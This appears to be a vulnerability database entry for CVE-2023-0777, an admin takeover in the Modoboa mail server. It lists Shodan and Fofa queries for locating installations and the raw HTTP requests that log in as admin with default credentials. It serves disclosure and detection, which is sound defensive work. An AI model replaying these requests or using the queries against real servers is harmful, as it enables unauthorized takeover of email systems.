🔙 목록으로 돌아가기

CVE-2023-0777: modoboa 2.0.4 - Admin TakeOver

Titlemodoboa 2.0.4 - Admin TakeOver
Authorr3Y3r53
SeverityCritical
ImpactUnauthenticated attackers can exploit authentication bypass using default credentials to gain administrator access and completely compromise Modoboa email server installations.
Remediationupdate to version 2.0.4
CVSS Score9.8
EPSS Score0.71906
CVE IDCVE-2023-0777
CWE IDCWE-305,NVD-CWE-Other
Shodan Queryhtml:"Modoboa"http.favicon.hash:1949005079http.html:"modoboa"
Fofa Querybody="Modoboa"body="modoboa"icon_hash=1949005079
Tags cve2023 cve huntr packetstorm modoboa default-login vuln

🔍 Vulnerability Description

Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.

🌐 HTTP Request

GET /accounts/login/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 Thunderbird/140.0
Connection: close
Accept-Encoding: gzip
POST /accounts/login/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Content-Length: 68
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

csrfmiddlewaretoken=RVhoc6&username=admin&password=password&next=%2F
GET /dashboard/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-0777.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-0777.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A